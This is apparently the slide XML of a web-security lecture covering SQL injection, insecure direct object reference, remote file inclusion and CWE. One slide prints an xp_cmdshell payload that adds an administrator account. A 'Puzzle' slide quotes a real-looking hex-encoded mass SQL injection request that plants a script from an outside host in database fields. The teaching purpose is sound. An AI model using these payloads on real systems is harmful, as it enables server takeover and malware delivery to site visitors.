              <a:rPr lang="en-US" altLang="nb-NO" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF6600"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'; exec master..</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF6600"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xp_cmdshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF6600"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 'net </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF6600"/>
                </a:solidFill>
              </a:rPr>
              <a:t>localgroup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF6600"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Administrators username /add';--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’ and password= ‘’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="nb-NO" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" altLang="nb-NO" sz="2800" dirty="0"/>
              <a:t>SQL Injection examples are outlined in:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" altLang="nb-NO" sz="1800" b="1" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://www.spidynamics.com/papers/SQLInjectionWhitePaper.pdf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nb-NO" sz="1800" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="nb-NO" sz="1800" b="1" dirty="0">
              <a:hlinkClick r:id="rId3"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" altLang="nb-NO" sz="1800" b="1" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://www.unixwiz.net/techtips/sql-injection.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" altLang="nb-NO" sz="1800" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="nb-NO" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Date Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A20E3185-337C-B7FF-28E2-42539A140789}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{D7F1DF17-8272-47A3-8D9A-6588A45862FC}" type="datetime1">
              <a:rPr lang="nb-NO" smtClean="0"/>
              <a:t>23.08.2023</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E20CB43A-B265-05DD-269E-BE6A7586C357}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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23862883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1752600" y="274638"/>
            <a:ext cx="8610600" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO"/>
              <a:t>Insecure Direct Object Reference</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="652291" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2057400" y="1447800"/>
            <a:ext cx="8229600" cy="4876800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="10000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" sz="2400"/>
              <a:t>“A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, database record, or key, as a URL or form parameter. Attackers can manipulate those references to access other objects </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" sz="2400" b="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>without authorization</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="10000"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="10000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" sz="2400"/>
              <a:t>Fancy term for parameter tampering</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="10000"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="nb-NO" sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="10000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" sz="2400"/>
              <a:t>Involves modifying parameters to access unauthorized materials</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="10000"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="nb-NO" sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="10000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" sz="2400"/>
              <a:t>E.g. /BankAccount.jsp?acct_nmbr=123</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="10000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" sz="2000"/>
              <a:t>The hacker modifies the parameter to view another users account</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Date Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1457BB9F-1ACD-0E00-1431-3399B9CA49CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{E7AADD58-8652-4A44-A77E-A4712E6F2727}" type="datetime1">
              <a:rPr lang="nb-NO" smtClean="0"/>
              <a:t>23.08.2023</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B61144ED-A786-7098-DFE8-1BFC89A9E179}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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59553715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a:xfrm>
            <a:off x="1981200" y="0"/>
            <a:ext cx="8229600" cy="990600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO"/>
              <a:t>Malicious File Execution</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="768003" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1752600" y="914400"/>
            <a:ext cx="8763000" cy="5791200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" sz="2400"/>
              <a:t>“Code vulnerable to remote file inclusion (RFI) allows attackers to include hostile code and data, resulting in devastating attacks, such as total server compromise. Malicious file execution attacks affect PHP, XML and any framework which accepts filenames or files from users.” </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" sz="2800"/>
              <a:t>Happens when code is executed on the server from a non-trusted source</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" sz="2000">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>All web applications are vulnerable to malicious file execution if they accept filenames or files from the user. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="nb-NO" sz="2000" b="1">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" sz="2800"/>
              <a:t>Classic example: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" sz="2400" b="1"/>
              <a:t>PHP is particularly vulnerable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" sz="2400"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="nb-NO" sz="2800"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" sz="2000"/>
              <a:t>Hacker visits a website that allows uploads</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" sz="2000"/>
              <a:t>Hacker uploads a malicious code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" sz="2000"/>
              <a:t>Hacker learns directory structure and sends the path as a parameter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" sz="2000"/>
              <a:t>PHP code is executed on the server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO"/>
              <a:t>include $_REQUEST[‘filename’];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="nb-NO" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Date Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{303055A6-A8CF-9CFF-BFFE-0C673DE8606E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{D1348340-8563-45B8-8A7C-1422A0D3A34D}" type="datetime1">
              <a:rPr lang="nb-NO" smtClean="0"/>
              <a:t>23.08.2023</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84AC7E55-06AB-BDB6-AD76-2709A35CCE44}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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42182531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b-NO"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://cve.mitre.org</a:t>
            </a:r>
            <a:endParaRPr lang="nb-NO" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://cwe.mitre.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{543874DB-AACA-4D28-97D3-DB719DCB7D10}" type="datetime1">
              <a:rPr lang="nb-NO" smtClean="0"/>
              <a:t>23.08.2023</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="CWE categories and examples [20] | Download Scientific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8135" y="135164"/>
            <a:ext cx="4347680" cy="715955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79313" y="3304206"/>
            <a:ext cx="6439193" cy="2677656"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>The Common Weakness Enumeration (CWE) is a category system for software weaknesses and vulnerabilities. It is sustained by a community project with the goals of understanding flaws in software and creating automated tools that can be used to identify, fix, and prevent those flaws.</a:t>
            </a:r>
            <a:endParaRPr lang="nb-NO" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="839713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en-US" altLang="nb-NO"/>
              <a:t>Puzzle – What is this?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="387075" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1828800" y="1600200"/>
            <a:ext cx="8534400" cy="5791200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" sz="1800" dirty="0"/>
              <a:t>"GET /programs/biosafety/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" sz="1800" dirty="0" err="1"/>
              <a:t>bioSafety_handBook</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" sz="1800" dirty="0"/>
              <a:t>/Chapter%206-Bloodborne%20Pathogens%20Human%20Tissue?;DECLARE%20@S%20CHAR(4000);SET%20@S=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CAST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" sz="1800" dirty="0"/>
              <a:t>(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F73646F2E313030306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D2727207768!6!5726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F73646F2E313030306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="nb-NO" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Date Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{54B6C061-8E0C-5BD1-F57C-321685C5A485}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{8EFC2651-8699-4A3B-AC4F-EE142DF3224C}" type="datetime1">
              <a:rPr lang="nb-NO" smtClean="0"/>
              <a:t>23.08.2023</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26CA18AF-213D-B69F-ABD3-0504371378F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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38457121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131700" y="476925"/>
            <a:ext cx="7931150" cy="719137"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" altLang="nb-NO" dirty="0"/>
              <a:t>Vulnerability assessment</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24579" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1385646" y="1615027"/>
            <a:ext cx="10021107" cy="4103687"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" kern="1200" dirty="0"/>
              <a:t>Assess and secure all parts individually</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" kern="1200" dirty="0"/>
              <a:t> The idea is to force an attacker to penetrate several defence layers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-BE" kern="1200" dirty="0"/>
              <a:t> As a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-BE" kern="1200" dirty="0" err="1"/>
              <a:t>general</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-BE" kern="1200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-BE" kern="1200" dirty="0" err="1"/>
              <a:t>rule</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-BE" kern="1200" dirty="0"/>
              <a:t>, data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-BE" kern="1200" dirty="0" err="1"/>
              <a:t>stored</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-BE" kern="1200" dirty="0"/>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-BE" kern="1200" dirty="0" err="1"/>
              <a:t>databases</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-BE" kern="1200" dirty="0"/>
              <a:t> are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-BE" kern="1200" dirty="0" err="1"/>
              <a:t>considered</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-BE" kern="1200" dirty="0"/>
              <a:t> as "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-BE" kern="1200" dirty="0" err="1"/>
              <a:t>untrusted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-BE" kern="1200" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" kern="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" i="1" kern="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" i="1" kern="1200" dirty="0"/>
              <a:t>"In God we trust, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" i="1" kern="1200" dirty="0"/>
              <a:t>for the rest, we test"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFontTx/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" kern="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="713996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options</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
